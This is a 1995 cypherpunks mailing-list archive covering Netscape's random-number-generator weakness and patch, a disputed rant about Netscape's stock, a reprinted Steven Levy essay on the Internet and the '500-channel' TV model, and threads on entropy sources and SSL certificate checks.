M4&"J5GH4'*<0#-Q]&JL-&Y4R<$O?)C6L)NGKVB$`&]>;9MS.YQHK3F1OW3X( M]G`T.DM1D]2DBYJ49HVLL,K(".E&M4"YG\;"QAZU.]$E[W5:FYS at 8/9:45@= M:,C86A7AJ&^I(>JP15%78[8ZB=U,G16%L\;2W.1P$@VH*:+9[&BV'&@@&AFG M!45-HU6Q[$R-!<6*K_"K(\\>QW]$+.\YP7;XCAUF.[S'?>U>MH/W'??RZDQ+ MU]&3O*_SSP*[I;V8+:VHV,F^?Y+='?#RG5X_:^<]_DYU)M9/LHY8G]\G^#Q' M?'_U^3O9E_&70FUE_5T">Z3+T^'MP!'_!E!+`P04``(`"```"#0;^)ID=V\" M``!=!```!@```%)%041-15532V_4,!"^1_(?X#3'5MJN6AX5UXH*40%"L$B( MX\2>C:TF=O#87>7?,^-D2SGM9CS^YGN,?]S]NG\X?-X??A\@,"#&:IN9!;=;G45BBIX#@N\!1RJ3CNP%.T9+HH&D2S0LHD(N-P%"G%2^]_9NMEL6:@`ILWIELMT/+98VY, M9_&V#6<%HS!$[1$+=OI+$?M1N'LA6AD':C'%!;X_?+AZ?RW1B`F33%2H4+AY MUZ-:W:-]K#-P.I:3Z#>=;$'!K?!)4EL'%*7)2OLJ=C77>DEC"*9&IN3!C#++&7 MIO*9 at UK^(`G8-$VD at 1(Z9:X]+MDJQ;*N at 95^01X7Y2WT`IN.>"8;6MPE5]I! M.,*2:B/U0 at .<0O';:Y%/;L]`)F3=2HSP]7"E1^_VUVUEU^;GP,3C]E3^';5/ M?6>F\\@P)5T[!;JY?OT6S@^']<;M&UAWMGW=W((7@;R#GBP*2].)G<*3D!=U MR9$DG98FWZ:V?EMN!">?Q/(VN_+JD7JP2ES#W.1N"\TOEV[$1>^HD1L_T_6I M1H=9$I(<7OT%4$L!`A0`%``"``@`0`D]&S7N4\HK`0``U0$```L````````` M`0`@`````````$A)4U1/4EDN5%A44$L!`A0`%``"``@```@T&T%+/^!$&``` M6SP```L``````````0`@````5`$``%)!5T1)4TLN1$]#4$L!`A0`%``"``@` M0`D]&TX!B-G3!0``TPD```L````````````@````P1D``%)!5T1)4TLN4UE3 M4$L!`A0`%``"``@```@T&_B:9'=O`@``700```8``````````0`@````O1\` =`%)%041-15!+!08`````!``$`-\```!0(@`````` ` end sum -r/size 45061/12471 section (from "begin" to "end") sum -r/size 19623/9029 entire input file -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGKA894nNf3ah8DHAQHqfwP/ao6/+WwjDqv/DVfFHSupinSVq13tJurf GwTGRHuztQQcqGsCmEJyd7VDJG5L/Hdcqqwq2VL0KYbkSEo4HhNuRuZlQfVbTCQ9 0U3ShLUf3HaFf3n+ZoyU+QRt/GMuF4DTCnUwPW/FNSvwI2JdjoRDliCG4HuRLr/X ANKfSG9XxIc= =U7/K -----END PGP SIGNATURE----- --- edgar at HighNRG.sbay.org Keep Freestyle Alive! From rooster at ix.netcom.com Sat Sep 23 02:53:19 1995 From: rooster at ix.netcom.com (BRIAN PROBST ) Date: Sat, 23 Sep 95 02:53:19 PDT Subject: No Subject Message-ID: <199509230953.CAA21280@ix7.ix.netcom.com> ROSTER at IX.NETCOM.COM THANK YOU!! 
From rsalz at osf.org Sat Sep 23 03:00:16 1995 From: rsalz at osf.org (Rich Salz) Date: Sat, 23 Sep 95 03:00:16 PDT Subject: Fwd: Re: Project: a standard cell random number generator Message-ID: <9509230959.AA23786@sulphur.osf.org> >Yes Fortezza cards can be instructed to produce a random number through one >of its library calls (someday they'll have a real API). One of the I don't understand the parenthetical comment. Are you saying the API that the NSA defined isn't supported by everyone, isn't complete, or is "bad"? /r$ From habs at warwick.com Sat Sep 23 04:47:45 1995 From: habs at warwick.com (Harry S. Hawk) Date: Sat, 23 Sep 95 04:47:45 PDT Subject: The Next Hack In-Reply-To: <4407p5$on4@tera.mcom.com> Message-ID: <199509231147.HAA21618@cmyk.warwick.com> > In article <199509211832.LAA24086 at infinity.c2.org>, sameer at c2.org > (sameer) writes: > > Now that we've seen that Netscape is doing a good job towards > > trying to fix the hole that Ian and David have uncovered, it's time to > > start looking at new things. > > Proposal for action: Jeff writes: > What else do you hope to gain by breaking a server key? I think > the point has been made. Is there anything else that you would > reasonably expect that we would do in response to a server key > being broken that we have not already done? > > --Jeff Clearly the point that Sameer is making includes the Meta crypto creed, which is that all security systems and their components should be discussed and tested in public. That it is not enough to test the client and that encryption contained in server products must also be dragged into the daylight. Harry Hawk habs at panix.com Freelancer for NetGuide Mag. All comments are my own. From carolann at censored.org Sat Sep 23 05:17:20 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Sat, 23 Sep 95 05:17:20 PDT Subject: HEY!!!
WAS: The Next Hack Message-ID: <199509231217.FAA27504@usr1.primenet.com> -----BEGIN PGP SIGNED MESSAGE----- Hey wait a minute!!! You HAD stated a patch would be available by Friday. Now we are at early next week. I watched the stock rise in the face of bad facts. Almost 25% of your stock changed hands yesterday. For the moment, it seems to me, anyway, you're getting a lot of work done here for dirt cheap. I don't know cypher codes very well, but I know Wall St. codes really well. And THEY ARE BEING VIOLATED! I am glad there is no anonymity on Wall St. We are starting to get into the realm of SEC action. And I could really care much about what happens out on the list. This is not a problem that lends itself to 'quick fixes'. For the only "quick fix" you can give is still insecure crypto. That is the point of this. You can't really fix it. Most of us know it. The lies mount up on the stock price. I normally couldn't care less, I'm a Coca-Cola trader. My stock is at an all time high as I write this. It's up over 1200% in 10 years. No one can match it. (even MSFT) This is much worse than NEW COKE! For you are now better off letting them break key after key, server after server, until the laws change. I'd go back and talk to your management fast. For now you've become a pawn in a political game. And millions of dollars change hands daily as a result. Soon they will halt your stock trading if this keeps up. Something, in a way far worse than ever having Netscape cracked! Think about it. Love Always, Carol Anne ps I shipped all the postings to Washington already. > What exactly is the point of this? We have: > > 1) acknowledged that the RNG used in the server private-key > generation has the same problem > > 2) said that we will provide a patch early next week > > 3) said that we will provide new certificates for all customers > > 4) promised to make source code for our new seed generation code > publicly available > What else do you hope to gain by breaking a server key?
I think >Jeff Weinstein - Electronic Munitions Specialist >Netscape Communication Corporation >jsw at netscape.com - http://home.netscape.com/people/jsw >Any opinions expressed above are mine. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGP6MIrpjEWs1wBlAQFh3QP8D+m5NyD4WNZEyOSzollcUDqEQusjxr5s 0t9455KBAGnvt/5UAyaQ0JdDqZ3wRePsoC9VVxHiiITjhZGbwalcgrDVmajAXVbG T+Hm4PEpM7tWt+R6pMvjhGcP2ldtzZf+OErE/yCSPTooxuOX5H6bBpb5e88n0eqo JpbxSBXgCX4= =C7J9 -----END PGP SIGNATURE----- -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From nobody at REPLAY.COM Sat Sep 23 05:40:19 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 23 Sep 95 05:40:19 PDT Subject: 500m.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo. Message-ID: <199509231240.OAA08555@utopia.hacktic.nl> NYT Magazine, Sept 24, 1995 How the Propeller Heads Stole the Electronic Future The silver-haired media monopolists follow their 500-channel dream. They haven't reckoned with the 500 million channels of Netscape and the Internet. By Steven Levy. If you want an arbitrary date for the burial of the 500-channel dream, Aug. 9, 1995, will do just fine. On that morning, the public had its first crack at buying stock in the year-old Netscape Communications Corporation, which makes software that helps people navigate the Internet and set up "sites" that Net surfers can visit. What happened next is already the stuff of high-tech legend.
The offering price of $28 per share shot up within minutes to a vertiginous $75 until finally settling at $58, a price that valued the as-yet-profitless company at well over $2 billion. A month later, it was trading at about $53. The initial news reports focused on the instant millionaires at Netscape, including a 24-year-old computer programmer, Marc Andreessen, who emerged from the stock offering with that all-important first $58 million. But the real significance of the event was not that another bunch of propeller heads had joined the ranks of the super-rich. Aug. 9 marked the moment when Wall Street finally realized what had been becoming increasingly apparent to computer users: a set of highly technical but reliably standardized communications protocols known as the Internet had established itself as the real key to the electronic future. That future would be made not by silver-haired telephone- and cable-company executives in Denver, New York and Washington, building an empire around a golden goose called pay-per-view television, but by companies like Netscape and their customers. In short, the end of the 500-channel dream. This was a myth constructed by the masters of the media, people like John Malone of Tele-Communications Inc. (T.C.I.), Ray Smith of Bell Atlantic and Sumner Redstone of Viacom. They believed that the television set would extend its domain from the center of the entertainment universe to the worlds of commerce and information. Despite their promises that the new era of digital media would be marked by increased competition, they assumed that their companies would keep their hands on the valves of a limited information pipeline. But for consumers, the dream offered only two differences, really, between what the public has now and what will be available in the future. *The same programming but more of it*. Instead of getting 50 or 60 alternatives when you plopped down in front of the tube, you'd get a lot more. 
Five hundred was the number that stuck in people's minds. *So-called interactive programming*. The interactivity comes in making choices: pressing buttons to choose programs and, above all, to buy things. The living-room television would be a cash register of sorts, enabling Dad, Mom, Junior, Sis and probably even the faithful dog Astro to buy more programming -- and buy more everything, from pizzas to Dustbusters. The operators of those systems, like T.C.I. and Time Warner, would act as gatekeepers, deciding which entertainment channels, pay-per-view events, banks, retailers, publications and data bases would reach consumers. There were tremendous opportunities to make money, not only from monthly fees and pay-per-view charges but also from percentages of every transaction. And then there was the wealth of information about consumer buying habits generated by the aggregation of buying choices made by pressing those buttons. This, too, would be sold and bartered. For the past few months the silver-haired guys have been arranging expensive technology tests in places like Orlando, Fla. They have been wooing Congress for favorable regulations. They have been frantically merging and making alliances. But meanwhile, a different vision of the media future has begun to form -- totally under their radar. It moved from the academic and scientific communities, then to the business world, then to politics. As it grew and grew, it suddenly became clear that this new vision had the potential to pull the plug on the 500-channel dream. This is the Internet and its most interesting subset, the World Wide Web. It is based on unlimited channels of communication, community building, electronic commerce and a full-blown version of interactivity that blurs the line between provider and consumer. You don't need an Arthur Andersen report or even a cyberpunk science fiction novel to envision how this new model of the future will work. Millions are already participating in it.
Its nascent form -- albeit with often sluggish performance and frequent system crashes -- has spread like digital wildfire. In short, the information superhighway, font of a thousand bad metaphors, is already here. But it's not about sitting on a couch and pressing a button to order "Dumb and Dumber." It's about Web surfing, open systems and freedom. Why did the stock market go bonkers for Netscape, a year-old company that not only operated deep in the red but also warned in its prospectus that it did not intend to make any profits "in the foreseeable future?" Only one reason: the Internet. If the 500-channel dream on the TV screen is the old future, the new one is the Internet on the computer screen. Think of it as a combination book, radio, magazine, mailbox, conversation parlor, bulletin board, billboard and, one day, television set. Install what is known as a browser program -- the most popular is Netscape's Navigator -- and you're cruising the World Wide Web. Your screen is a selection of signed baseballs up for auction, a tour of the Louvre, a zine (a self-published magazine) on the life of a teen-age girl in Canada, a multimedia repository of General Electric's public relations documents, the complete text of the Congressional Record. Millions of possibilities await you, and getting to them is easy. Anything can be wired to anything else on this World Wide Web (thus the name) by moving the cursor to a highlighted word or image with an embedded link to another location. Web travelers do not just travel by links, of course -- they can go directly to any Web site. The interesting thing about the sites is their equality. Like phone numbers, or addresses on letters, these addresses have no favored positions; in terms of gaining access to homes, ABC, Disney and Sears have no inherent advantage over Joe's Video or the corner pizza parlor.
(For help in knowing what's available, people are already adopting the first of a new breed of electronic guide services, like the popular Yahoo Web site, a sort of Baedeker's of the Net.) At first, Web traveling seems like a fascinating but perhaps frivolous diversion. But then you consider the next step -- commerce. Secure credit-card transactions are already possible, the ability to charge for time spent on a link is currently being implemented and companies like Visa, Mastercard and newer entities with names like Cybercash and Digicash (and, yes, Microsoft) are concocting Net-based technologies that work just like cash. And then you begin to realize why some farsighted people in the media industries are terrified of the World Wide Web. Every home is potentially a video conferencing center, every independent film maker is potentially a widespread broadcaster, every business is potentially a global marketer. A single twisted idea and a rudimentary sense of layout can transform a voiceless outcast into a cult publisher. Now that's interactivity. The 500-cable-channel tests are just the beginning of a long process. The Net, meanwhile, has millions of people on it, now. It will take a decade or so to upgrade the Net to carry high-quality video services, but most everything else is feasible now and better suited to the desktop than to the TV room. You can't easily read a newsletter or a bank balance on a television set that's 20 feet away. So by the time the cable and telephone companies get their systems in order, millions of Americans will be riding the I-way from their dens and offices, not their living rooms. Sure, eventually the electronics of computers and televisions will be indistinguishable, but by then the road to information nirvana will have been laid -- and the ethos will be that of the Internet. In that ethos, the people who provide you the pipes to move information have no say in what content moves through those pipes.
They collect no information on their consumers' buying habits, and they certainly do not get a piece of the transactions that occur over their wires. The guys in the middle -- those with the 500-channel dream -- will thus be cut out of the best part of the action. The masters of the media have taken notice, and lately they've been hedging their bets. Still, they have yet to grasp that the Internet can never be merely another profit center in their dreams of empire. Their power is based on monopoly, on controlling distribution. But the Net is built to smash monopolies. Instead of a gatekeeper, users get an open invitation to the electronic world and can choose whatever they want. "If there is a market for 500 channels," says James Barksdale, Netscape's president, "imagine the market for 5 million, 50 million, 500 million!" Now, this new vision doesn't portend poverty for the media masters. There's still a place for movie studios, television producers and music publishers -- the Disneys of the world -- in this new, content-driven universe. The phone companies will provide Internet access to the masses. And the couch-potato style of television will probably always be with us. But it won't be business as usual for the media masters. It's entirely possible that beginning novelists, musicians and even film makers will choose to distribute through the Web. And it's almost inevitable that one day soon, a John Grisham, an R.E.M. or a Roseanne will grasp the advantages of ditching the media company and selling directly to the consumer. A year ago, people were buzzing about the proposed (and eventually aborted) marriage of Bell Atlantic and T.C.I. Now people are talking about Disney and Cap Cities, CBS and Westinghouse, and Ted Turner and some other television network. But if the World Wide Web shatters the current paradigm of distribution, the channel capabilities of cable systems and even networks will be severely devalued. 
Anyone will be able to set up a new channel or storefront on the virtual highway, for free, asking permission of no one and accepting income directly over the wire. This is why John Perry Barlow, co-founder of the Electronic Frontier Foundation, calls the current wave of media realliances "the rearrangement of deck chairs on the Titanic." The iceberg, of course, is the Internet. ---------- Steven Levy is a columnist for Newsweek. His last article for the New York Times Magazine was "The Unabomber and David Gelernter." From remailer at bi-node.zerberus.de Sat Sep 23 06:15:30 1995 From: remailer at bi-node.zerberus.de (Ford Prefect) Date: Sat, 23 Sep 95 06:15:30 PDT Subject: No Subject Message-ID: Again, we're Spammed by a moron. Time to fire up the old remailers! [At least they do this on weekends, when we have time for creative revenge!] Hehehehehe... From trei at process.com Sat Sep 23 06:42:24 1995 From: trei at process.com (Peter Trei) Date: Sat, 23 Sep 95 06:42:24 PDT Subject: (Fwd) Netscape Commerce Server and Certificates Message-ID: <9509231342.AA03015@toad.com> >From www-security... ------- Forwarded Message Follows ------- Date: Sat, 23 Sep 95 01:07:38 From: Subject: Netscape Commerce Server and Certificates To: "john hemming ceo marketnet" , www-security at ns2.rutgers.edu Cc: The Commerce server is significantly less vulnerable because:
1. Key pairs are generated only once
2. Access to the actual server is limited for hackers to try to guess with some accuracy when the key pair was generated.
3. The time it takes to generate key pairs is about 5 seconds on a reasonably powerful UNIX machine.
4. Since the random number seed address space is 30 bits, even if one knew approximately when the server key-pair was generated it only reduces this down to say 20 bits. Therefore the operation can take anywhere from (2**20 to 2**30) * 5 seconds = 5 million to 5 billion seconds. 5 million seconds = 57.8 days 5 billion seconds = 158 years
5.
We plan to have the patch available by next week
6. You are right about server owners having to get new certificates. Netscape and VeriSign will offer new six month certificates to all current certificate owners at no charge. --Atri At 09:58 PM 9/22/95 PDT, John Hemming CEO MarketNet wrote: >>Netscape Commerce server certificates use RSA key pairs generated by the
>>user, i.e. with "Netscape's shoddy random number genrator" (sic). All the
>>servers running in "secure" mode need new RSA keys and certificates as noted
>>in the following excerpt from the official Netscape response.
>
>>"In addition, the current version of the Netscape Commerce Server has a
>>similar vulnerability during it's initial key-pair generation. Therefore, a
>>patch will be made available from Netscape and should be applied by Commerce
>>Server customers to generate a new key pair and server certificate."
>If that is really what Netscape have issued then it needs correcting unless >for some reason RSA's private key is stored in the Commerce Server. I would >presume that a certificate request would be needed instead. > >There is really quite a high noise to signal ratio in dealing with the >non-randomness of the unix Navigator (which is what I understand >the problem to be). > > > > ____________________________________ Atri Chatterjee Server Marketing Netscape Communications Corporation (415) 528-2834 (ph) (415) 528-4120 (fax) Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From jamesd at echeque.com Sat Sep 23 07:30:22 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 23 Sep 95 07:30:22 PDT Subject: Seeds which depend on machine states Message-ID: <199509231430.HAA23116@blob.best.net> At 08:19 AM 9/22/95 -0700, Patrick Horgan wrote: > That assumes that you have some way of measuring the timing to microsecond > precision. On most machines I've been on, if you get something time- > stamped, even if there is a microsecond portion of the timestamp it's > meaningless because it wasn't based on a timer with the required precision. On Windows there is a timer with the required precision -- not microsecond accuracy of course -- microsecond precision. For our purposes the less accuracy the better. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From perry at piermont.com Sat Sep 23 07:53:30 1995 From: perry at piermont.com (Perry E.
Metzger) Date: Sat, 23 Sep 95 07:53:30 PDT Subject: Council of Europe proposes to outlaw strong encryption (fwd) In-Reply-To: <199509221509.LAA09991@panix.com> Message-ID: <199509231453.KAA05871@frankenstein.piermont.com> Duncan Frissell writes: > Question for Perry -- I'm assuming that it will soon be possible to > originate encrypted TCP/IP sessions with a distant "process" somewhere. Do > you see technical problems with a TCP/IP laundry being established > "somewhere" that strips trace info from one of my processes and prevents > back tracing beyond the mouth of this encrypted pipe? It can be done (in some sense it's just an extension of the Socks protocol), but I'm not sure how easy it will be to prevent all traffic analysis on the thing. Also, if this gets done frequently, it sort of screws up our attempts to keep up the efficiency of traffic in the network. > Also Perry, what did you think of the article "How Anarchy Works" in the > latest Wired on the IETF? I haven't read it, although the IETF is certainly (whether it knows it or not) an organization run on anarchist lines. Perry From dmandl at panix.com Sat Sep 23 08:13:31 1995 From: dmandl at panix.com (David Mandl) Date: Sat, 23 Sep 95 08:13:31 PDT Subject: HEY!!! WAS: The Next Hack Message-ID: Looks like we've got a perfect candidate for the first Official Cypherpunks Press Release, folks. --D. At 7:16 AM 9/23/95, Censored Girls Anonymous wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >Hey wait a minute!!! > >You HAD stated a patch would be available by Friday. >Now we are at early next week. > >I watched the stock rise in the face of bad facts. >Almost 25% of your stock changed hands yesterday. > >For the moment, it seems to me, anyway, you're getting >a lot of work done here for dirt cheap. I don't know >cypher codes very well, but I know Wall St. codes really >well. And THEY ARE BEING VIOLATED! I am glad there is no >anonymity on Wall St. We are starting to get into the >realm of SEC action.
And I could really care much about >what happens out on the list. > >This is not a problem that lends itself to 'quick fixes'. >For the only "quick fix you can give is still insecure crypto". > >That is the point of this. >You can't really fix it. >Most of us know it. >The lies mount up >on the stock price. > >I normally couldn't care less, I'm a Coca-Cola trader. >My stock is at an all time high as I write this. >It's up over 1200% in 10 years. No one can match it. (even MSFT) > >This is much worse than NEW COKE! > >For you are now better off letting them break key after key, >server after server, until the laws change. > >I'd go back and talk to your management fast. >For now you've become a pawn in a political game. >And millions of dollars change hands daily as a result. > >Soon they will halt your stock trading if this keeps up. > >Something, in a way far worse than ever having Netscape cracked! > >Think about it. > >Love Always, > >Carol Anne >ps I shipped all the postings to Washington already. > >> What exactly is the point of this? We have: >> >> 1) acknowledged that the RNG used in the server private-key >> generation has the same problem >> >> 2) said that we will provide a patch early next week >> >> 3) said that we will provide new certificates for all customers >> >> 4) promised to make source code for our new seed generation code >> publicly available > >> What else do you hope to gain by breaking a server key? I think >>Jeff Weinstein - Electronic Munitions Specialist >>Netscape Communication Corporation >>jsw at netscape.com - http://home.netscape.com/people/jsw >>Any opinions expressed above are mine. 
> > >-----BEGIN PGP SIGNATURE----- >Version: 2.6.2 > >iQCVAwUBMGP6MIrpjEWs1wBlAQFh3QP8D+m5NyD4WNZEyOSzollcUDqEQusjxr5s >0t9455KBAGnvt/5UAyaQ0JdDqZ3wRePsoC9VVxHiiITjhZGbwalcgrDVmajAXVbG >T+Hm4PEpM7tWt+R6pMvjhGcP2ldtzZf+OErE/yCSPTooxuOX5H6bBpb5e88n0eqo >JpbxSBXgCX4= >=C7J9 >-----END PGP SIGNATURE----- >-- > >Member Internet Society - Certified BETSI Programmer - Webmistress >*********************************************************************** >Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 >My Homepage >The Cyberdoc >*********************************************************************** >------------------ PGP.ZIP Part [017/713] ------------------- >M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M >MF=O0H+*%(-S%&>S%+FS&MPGD------------------------------------------------------------- >for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ -- Dave Mandl dmandl at panix.com http://wfmu.org/~davem From m5 at dev.tivoli.com Sat Sep 23 08:32:13 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Sat, 23 Sep 95 08:32:13 PDT Subject: HEY!!! WAS: The Next Hack In-Reply-To: Message-ID: <9509231531.AA20035@alpha> David Mandl writes: > Looks like we've got a perfect candidate for the first Official > Cypherpunks Press Release, folks. Then sign me off. If something that inane were to go out with the word "cypherpunk" affixed to it, I'd cringe. It could only be worse if it ended with the catchphrase "hack the planet". [ David quoted the "Censored Girl": ] > >Hey wait a minute!!! > > > >You HAD stated a patch would be available by Friday. > >Now we are at early next week. > > > >I watched the stock rise in the face of bad facts. > >Almost 25% of your stock changed hands yesterday. So? > >For the moment, it seems to me, anyway, you're getting > >a lot of work done here for dirt cheap. I don't know > >cypher codes very well, but I know Wall St. codes really > >well. And THEY ARE BEING VIOLATED! 
I am glad there is no > >anonymity on Wall St. We are starting to get into the > >realm of SEC action. And I could really care much about > >what happens out on the list. I won't even dignify this by calling it speculation; it's simply and absolutely wrong. Any "Netscape insiders" are locked out; they couldn't manipulate the stock price if they wanted to, and if they have any brains in their heads at all they're absolutely the last people on earth who'd make a move that stupid. It won't be until January at the very earliest that anyone who holds restricted shares will be allowed to trade. The stock's in all likelihood being bounced back and forth between big technology funds, who don't give a rat's ass about some security bug in the product. > >That is the point of this. > >You can't really fix it. > >Most of us know it. Gee, I don't know that. > >The lies mount up > >on the stock price. Huh? Do you actually have any earthly idea how the market works? > >I normally couldn't care less, I'm a Coca-Cola trader. > >My stock is at an all time high as I write this. > >It's up over 1200% in 10 years. No one can match it. (even MSFT) > > > >This is much worse than NEW COKE! Ridiculous. > >Soon they will halt your stock trading if this keeps up. I'll eat my shoe if that happens. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From perry at piermont.com Sat Sep 23 08:43:53 1995 From: perry at piermont.com (Perry E. 
Metzger) Date: Sat, 23 Sep 95 08:43:53 PDT Subject: Seeds which depend on machine states In-Reply-To: <9509221519.AA19310@cantina.verity.com> Message-ID: <199509231543.LAA05907@frankenstein.piermont.com> Patrick Horgan writes: > > Try getting a human to type with the same timing, to microsecond > > precision, the same way twice. > > > That assumes that you have someway of measuring the timing to microsecond > precision. PCs have accurate microsecond timers. Perry From dmandl at panix.com Sat Sep 23 08:46:30 1995 From: dmandl at panix.com (David Mandl) Date: Sat, 23 Sep 95 08:46:30 PDT Subject: HEY!!! WAS: The Next Hack Message-ID: At 10:31 AM 9/23/95, Mike McNally wrote: >David Mandl writes: > > Looks like we've got a perfect candidate for the first Official > > Cypherpunks Press Release, folks. > >Then sign me off. If something that inane were to go out with the >word "cypherpunk" affixed to it, I'd cringe. It could only be worse >if it ended with the catchphrase "hack the planet". Sigh. In case there was any misunderstanding, it was a JOKE. I was making a comment about "Censored Girl's" loony-bin post as well as recent proposals that we should be issuing official press releases. Surely my subtle sense of humor isn't THAT subtle. Here: :-) --Dave. -- Dave Mandl dmandl at panix.com http://wfmu.org/~davem From kinney at bogart.Colorado.EDU Sat Sep 23 08:54:43 1995 From: kinney at bogart.Colorado.EDU (W. Kinney) Date: Sat, 23 Sep 95 08:54:43 PDT Subject: MacRandoms Message-ID: <199509231554.JAA16098@bogart.Colorado.EDU> I tried posting this a few days ago, but it evidently got lost because of the problems with the list. Anyway, I've uploaded my random number generator number generation code for the Mac to: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/randomness/MacRandoms.sea.hqx This file contains Colin Plumb's randpool code, my Macintosh wrapper for it, and a nice 68K assembler implementation of MD5 as a bonus. Enjoy. 
-- Will From m5 at dev.tivoli.com Sat Sep 23 09:01:16 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Sat, 23 Sep 95 09:01:16 PDT Subject: HEY!!! WAS: The Next Hack In-Reply-To: Message-ID: <9509231600.AA20401@alpha> David Mandl writes: > Sigh. In case there was any misunderstanding, it was a JOKE. I was making > a comment about "Censored Girl's" loony-bin post as well as recent > proposals that we should be issuing official press releases. Surely my > subtle sense of humor isn't THAT subtle. Here: Sorry. Caffeine deficit. (Plus the added sensitivity of living in the bizarre atmosphere of a recently-gone-public company.) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From carolann at censored.org Sat Sep 23 09:16:03 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Sat, 23 Sep 95 09:16:03 PDT Subject: ? Me? Message-ID: <199509231615.JAA02784@usr3.primenet.com> What? Me? Write a Cypherpunks Press Release? Love Always, Alfreda E. 
Newman -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From carolann at censored.org Sat Sep 23 09:19:39 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Sat, 23 Sep 95 09:19:39 PDT Subject: Step One: We admitted Message-ID: <199509231619.JAA15885@usr1.primenet.com> We admitted we were powerless over the prospect of a Cypherpunk Press Release. That our coding had become unmanageable....... Love Always, Carol Anne Coketrader -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From alano at teleport.com Sat Sep 23 09:31:19 1995 From: alano at teleport.com (Alan Olsen) Date: Sat, 23 Sep 95 09:31:19 PDT Subject: Message-ID: <199509231631.JAA17499@desiree.teleport.com> At 03:15 PM 9/23/95 DST, you wrote: >Again, we're Spammed by a moron. >Time to fire up the old remailers! >[At least they do this on weekends, when we have >time for creative revenge!] Hehehehehe... Either that or someone left their terminal logged in. The only better way to assure a quick and painful death would have been to post them to a Black Panther's mailing list. Oh well... Evolution in action! 
| Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From bianco at itribe.net Sat Sep 23 10:41:57 1995 From: bianco at itribe.net (David J. Bianco) Date: Sat, 23 Sep 95 10:41:57 PDT Subject: SSL Man-in-the-middle In-Reply-To: <199509221407.KAA23176@gatekeeper.itribe.net> Message-ID: <199509231738.NAA25269@gatekeeper.itribe.net> On Sep 22, 10:10, David J. Bianco sent the following to the NSA's mail archives: > Subject: SSL Man-in-the-middle || I've read through the SSL spec, and it provides authentication for both || the server and the client, but these features are rarely used, probably || because they are somewhat inconvenient for the user. A good first step || would be to include the IP address of the server in the certificate || signed by VeriSign. In this way, browsers could perform automatic checks || that the IP address in the certificate is actually the one that's being || communicated with. This does raise other questions (such as protecting || from IP spoofing), but IMHO would be a good way of providing an automatic || "first check" without inconveniencing users. The added inconvenience of || obtaining a new certificate when your server's IP address changes is || fairly minor, and could be viewed as necessary overhead for doing secure || transactions via the Net. || || Of course, the above is complete and utter crap (as Simon Spero pointed out to me in much, much more polite terms 8-). Let me take a stab at v2.0: I've read through the SSL spec, and it provides authentication for both the server and the client, though these features are rarely used, probably because they are somewhat inconvenient for the user. 
A good practice would be to always code your SSL app to check that the CN (Common Name) field of the certificate is the same as the hostname listed in the URL (CN always appears to be an IP address, at least for Netscape server certificates). Still, even with the bogus last paragraph, I stand by the rest of my post. I obviously haven't seen Netscape source, so I don't really know what checks it might have, but none of the other SSL apps I've seen have an auto-check feature, though it doesn't seem to be much more trouble at all.

--
==========================================================================
